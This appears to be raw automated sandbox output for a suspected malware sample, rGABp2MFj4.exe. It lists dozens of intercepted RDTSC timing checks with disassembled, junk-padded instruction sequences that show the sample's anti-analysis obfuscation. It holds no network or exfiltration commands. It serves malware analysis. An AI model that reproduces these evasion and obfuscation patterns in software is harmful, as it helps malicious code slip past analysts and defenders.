Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0A7D second address: 75E0AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C0FA6748h 0x00000009 or al, FFFFFFD8h 0x0000000c jmp 00007FC7C0FA673Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea eax, dword ptr [ebx+78h] 0x0000001a pushad 0x0000001b mov ecx, 6CF57F87h 0x00000020 popad 0x00000021 push 00000001h 0x00000023 jmp 00007FC7C0FA6749h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0AD9 second address: 75E0ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0ADD second address: 75E0AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0AE1 second address: 75E0AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0AE7 second address: 75E0AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA6741h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0AFC second address: 75E0B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, B5h 0x0000000c pushfd 0x0000000d jmp 00007FC7C1180B3Fh 0x00000012 sub eax, 3D0B5D0Eh 0x00000018 jmp 00007FC7C1180B49h 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC7C1180B48h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0B56 second address: 75E0B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0B5A second address: 75E0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0B60 second address: 75E0BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c jmp 00007FC7C0FA6740h 0x00000011 nop 0x00000012 jmp 00007FC7C0FA6740h 0x00000017 push eax 0x00000018 jmp 00007FC7C0FA673Bh 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, 42B6h 0x00000025 call 00007FC7C0FA6747h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0C28 second address: 75E0C8D instructions: 0x00000000 rdtsc 0x00000002 call 00007FC7C1180B48h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov edi, eax 0x0000000d jmp 00007FC7C1180B41h 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 mov eax, 50845FC3h 0x0000001a mov ecx, 6343351Fh 0x0000001f popad 0x00000020 js 00007FC82F11F588h 0x00000026 pushad 0x00000027 mov esi, 10D0A917h 0x0000002c call 00007FC7C1180B3Ch 0x00000031 movzx esi, dx 0x00000034 pop ebx 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp-04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0C8D second address: 75E0C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0C91 second address: 75E0CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0CA0 second address: 75E0CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C0FA673Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0CCF second address: 75E0CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0CDF second address: 75E0D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f jmp 00007FC7C0FA6744h 0x00000014 call 00007FC7C0FA6742h 0x00000019 call 00007FC7C0FA6742h 0x0000001e pop esi 0x0000001f pop edx 0x00000020 popad 0x00000021 push 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov esi, edx 0x00000028 pushfd 0x00000029 jmp 00007FC7C0FA673Fh 0x0000002e adc eax, 118B20FEh 0x00000034 jmp 00007FC7C0FA6749h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0D67 second address: 75E0D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0D77 second address: 75E0DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FC7C0FA673Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC7C0FA6747h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0DA8 second address: 75E0DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0DC0 second address: 75E0DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0DDA second address: 75E0DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0DDE second address: 75E0DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0DF9 second address: 75E0E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C1180B48h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0E33 second address: 75E0E42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0E42 second address: 75E0E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0E48 second address: 75E0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0E4C second address: 75E0E74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7C1180B41h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0EB5 second address: 75E0F91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 57BB70D4h 0x00000008 jmp 00007FC7C0FA673Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 mov di, ax 0x00000016 popad 0x00000017 js 00007FC82EF44F11h 0x0000001d jmp 00007FC7C0FA6745h 0x00000022 mov eax, dword ptr [ebp-14h] 0x00000025 pushad 0x00000026 push esi 0x00000027 jmp 00007FC7C0FA6743h 0x0000002c pop esi 0x0000002d movsx edi, si 0x00000030 popad 0x00000031 mov ecx, esi 0x00000033 pushad 0x00000034 mov eax, 43C236ADh 0x00000039 mov eax, 4D7890A9h 0x0000003e popad 0x0000003f mov dword ptr [esi+0Ch], eax 0x00000042 pushad 0x00000043 mov bh, ah 0x00000045 pushfd 0x00000046 jmp 00007FC7C0FA6747h 0x0000004b adc ax, 738Eh 0x00000050 jmp 00007FC7C0FA6749h 0x00000055 popfd 0x00000056 popad 0x00000057 mov edx, 756006ECh 0x0000005c jmp 00007FC7C0FA673Eh 0x00000061 sub eax, eax 0x00000063 jmp 00007FC7C0FA6741h 0x00000068 lock cmpxchg dword ptr [edx], ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FC7C0FA673Dh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0F91 second address: 75E0FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007FC7C1180B3Eh 0x0000000f test eax, eax 0x00000011 jmp 00007FC7C1180B40h 0x00000016 jne 00007FC82F11F24Bh 0x0000001c jmp 00007FC7C1180B40h 0x00000021 mov edx, dword ptr [ebp+08h] 0x00000024 pushad 0x00000025 mov edx, esi 0x00000027 mov ecx, 0B5BD079h 0x0000002c popad 0x0000002d mov eax, dword ptr [esi] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov cx, 7617h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0FF2 second address: 75E1057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC7C0FA6748h 0x0000000c adc cx, 3AB8h 0x00000011 jmp 00007FC7C0FA673Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx], eax 0x0000001a jmp 00007FC7C0FA6746h 0x0000001f mov eax, dword ptr [esi+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC7C0FA6747h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1057 second address: 75E105D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E105D second address: 75E1061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1061 second address: 75E10D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e jmp 00007FC7C1180B46h 0x00000013 mov eax, dword ptr [esi+08h] 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a mov esi, edi 0x0000001c popad 0x0000001d mov dword ptr [edx+08h], eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FC7C1180B3Bh 0x00000027 or cx, BC9Eh 0x0000002c jmp 00007FC7C1180B49h 0x00000031 popfd 0x00000032 mov ah, 38h 0x00000034 popad 0x00000035 mov eax, dword ptr [esi+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E10D0 second address: 75E10D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E10D6 second address: 75E111E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C1180B3Dh 0x00000008 jmp 00007FC7C1180B40h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [edx+0Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FC7C1180B3Dh 0x0000001b call 00007FC7C1180B40h 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E111E second address: 75E11A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C0FA673Eh 0x00000009 and eax, 63AB3288h 0x0000000f jmp 00007FC7C0FA673Bh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+10h] 0x0000001d jmp 00007FC7C0FA6744h 0x00000022 mov dword ptr [edx+10h], eax 0x00000025 jmp 00007FC7C0FA6740h 0x0000002a mov eax, dword ptr [esi+14h] 0x0000002d jmp 00007FC7C0FA6740h 0x00000032 mov dword ptr [edx+14h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FC7C0FA6747h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E11A0 second address: 75E1213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e jmp 00007FC7C1180B3Dh 0x00000013 mov dword ptr [edx+18h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FC7C1180B3Ch 0x0000001d add ecx, 1C6CDC08h 0x00000023 jmp 00007FC7C1180B3Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FC7C1180B48h 0x0000002f or esi, 19A6FE68h 0x00000035 jmp 00007FC7C1180B3Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [esi+1Ch] 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1213 second address: 75E122E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E122E second address: 75E1233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1233 second address: 75E12FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+1Ch], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ah, EDh 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 call 00007FC7C0FA6741h 0x00000019 pop ebx 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+20h] 0x0000001e pushad 0x0000001f call 00007FC7C0FA6748h 0x00000024 pushfd 0x00000025 jmp 00007FC7C0FA6742h 0x0000002a adc eax, 098667E8h 0x00000030 jmp 00007FC7C0FA673Bh 0x00000035 popfd 0x00000036 pop ecx 0x00000037 call 00007FC7C0FA6749h 0x0000003c pushfd 0x0000003d jmp 00007FC7C0FA6740h 0x00000042 or ch, 00000078h 0x00000045 jmp 00007FC7C0FA673Bh 0x0000004a popfd 0x0000004b pop ecx 0x0000004c popad 0x0000004d mov dword ptr [edx+20h], eax 0x00000050 pushad 0x00000051 mov ax, bx 0x00000054 jmp 00007FC7C0FA6741h 0x00000059 popad 0x0000005a mov eax, dword ptr [esi+24h] 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov ecx, edi 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E12FB second address: 75E136B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C1180B40h 0x00000009 jmp 00007FC7C1180B45h 0x0000000e popfd 0x0000000f mov ax, 9667h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [edx+24h], eax 0x00000019 pushad 0x0000001a push ecx 0x0000001b call 00007FC7C1180B3Fh 0x00000020 pop esi 0x00000021 pop edi 0x00000022 mov al, 36h 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+28h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FC7C1180B3Ah 0x00000031 adc esi, 11390EF8h 0x00000037 jmp 00007FC7C1180B3Bh 0x0000003c popfd 0x0000003d mov ah, 3Ch 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E136B second address: 75E1370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1448 second address: 75E146E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E146E second address: 75E148B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E148B second address: 75E14B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7C1180B3Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E14B3 second address: 75E14DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C0FA673Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E14DA second address: 75E14EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E14EA second address: 75E1512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7C0FA6749h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1512 second address: 75E1527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1527 second address: 75E152D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E152D second address: 75E1568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f mov ebx, 125BE2A8h 0x00000014 call 00007FC7C1180B41h 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d jne 00007FC82F11ECF7h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, 2B25h 0x0000002a mov si, 54A1h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1568 second address: 75E1576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E1576 second address: 75E157A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E157A second address: 75E15C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d mov edx, 1C5D2E50h 0x00000012 pushfd 0x00000013 jmp 00007FC7C0FA6749h 0x00000018 add ah, FFFFFFD6h 0x0000001b jmp 00007FC7C0FA6741h 0x00000020 popfd 0x00000021 popad 0x00000022 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E15C5 second address: 75E15CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7630C6C second address: 7630C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7630C72 second address: 7630C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7630C83 second address: 7630D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC7C0FA673Eh 0x00000011 push eax 0x00000012 jmp 00007FC7C0FA673Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC7C0FA6744h 0x0000001f or ecx, 0AB097C8h 0x00000025 jmp 00007FC7C0FA673Bh 0x0000002a popfd 0x0000002b mov esi, 3C18093Fh 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 pushad 0x00000034 mov esi, 68A7E137h 0x00000039 movzx esi, di 0x0000003c popad 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 call 00007FC7C0FA6740h 0x00000046 pop eax 0x00000047 mov dh, CFh 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 757003D second address: 75700C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC7C1180B44h 0x00000011 and eax, 084871D8h 0x00000017 jmp 00007FC7C1180B3Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC7C1180B48h 0x00000023 adc ch, 00000038h 0x00000026 jmp 00007FC7C1180B3Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC7C1180B44h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75700C1 second address: 75700D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75700D3 second address: 75700FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C1180B45h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7570616 second address: 757061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 757098E second address: 7570992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7570992 second address: 7570998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7570998 second address: 757099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
